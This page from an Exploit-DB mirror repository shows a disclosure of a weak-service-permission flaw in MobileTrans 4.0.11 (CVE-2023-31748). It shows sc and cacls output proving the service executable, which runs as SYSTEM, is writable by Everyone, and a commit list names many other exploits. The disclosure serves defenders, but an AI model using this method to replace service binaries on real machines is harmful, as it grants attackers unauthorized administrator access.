bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/51479.txt
Exploit-DB 0a7adaa3fc DB: 2023-05-24 
40 changes to exploits/shellcodes/ghdb

Optoma 1080PSTX Firmware C02 - Authentication Bypass
Screen SFT DAB 600/C - Authentication Bypass Account Creation
Screen SFT DAB 600/C - Authentication Bypass Admin Password Change
Screen SFT DAB 600/C - Authentication Bypass Erase Account
Screen SFT DAB 600/C - Authentication Bypass Password Change
Screen SFT DAB 600/C - Authentication Bypass Reset Board Config
Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx)

PnPSCADA v2.x - Unauthenticated PostgreSQL Injection

Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution

Yank Note v3.52.1 (Electron) - Arbitrary Code Execution

Apache Superset 2.0.0 - Authentication Bypass

FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)

PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)

Affiliate Me Version 5.0.1 - SQL Injection

Best POS Management System v1.0 - Unauthenticated Remote Code Execution

Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)

ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)

CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)

e107 v2.3.2 - Reflected XSS

File Thingie 2.5.7 - Remote Code Execution (RCE)

GetSimple CMS v3.3.16 - Remote Code Execution (RCE)

LeadPro CRM v1.0 - SQL Injection

PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)

Prestashop 8.0.4 - CSV injection

Quicklancer v1.0 - SQL Injection

SitemagicCMS 4.4.3 - Remote Code Execution (RCE)

Smart School v1.0 - SQL Injection

Stackposts Social Marketing Tool v1.0 - SQL Injection

thrsrossi Millhouse-Project 1.414 - Remote Code Execution

TinyWebGallery v2.5 - Remote Code Execution (RCE)

WBiz Desk 1.2 - SQL Injection

Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)

WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup

Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title

Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking

MobileTrans  4.0.11 - Weak Service Privilege Escalation

Trend Micro OfficeScan Client 10.0 - ACL Service LPE
eScan Management Console 14.0.1400.2281 - Cross Site Scripting
eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
2023-05-24 00:16:34 +00:00

53 lines
No EOL
2 KiB
Text
Raw Permalink Blame History

# Exploit Title :MobileTrans 4.0.11 - Weak Service Privilege Escalation
# Date: 20 May 2023
# Exploit Author: Thurein Soe
# Vendor Homepage: https://mobiletrans.wondershare.com/
# Software Link:
https://mega.nz/file/0Et0ybRS#l69LRlvwrwmqDfPGKl_HaJ5LmbeKJu_wH0xYKD8nSVg
# Version: MobileTrans version 4.0.11
# Tested on: Window 10 (Version 10.0.19045.2965)
# CVE : CVE-2023-31748
Vulnerability Description:
MobileTrans is World 1 mobile-to-mobile file transfer
application.MobileTrans version 4.0.11 was being suffered a weak service
permission vulnerability that allows a normal window user to elevate to
local admin. The "ElevationService" service name was installed, while the
MobileTrans version 4.0.11 was installed in the window operating system.
The service "ElevationService" allows the local user to elevate to the
local admin as The "ElevationService" run with system privileges.
Effectively, the local user is able to elevate to local admin upon
successfully modifying the service or replacing the affected executable.
C:\Users\HninKayThayar\Desktop>sc qc ElevationService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ElevationService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files
(x86)\Wondershare\MobileTrans\ElevationService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare Driver Install Service help
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\HninKayThayar\Desktop>cacls "C:\Program Files
(x86)\Wondershare\MobileTrans\ElevationService.exe"
C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
Everyone:(ID)F
NT
AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
Reference in a new issue View git blame Copy permalink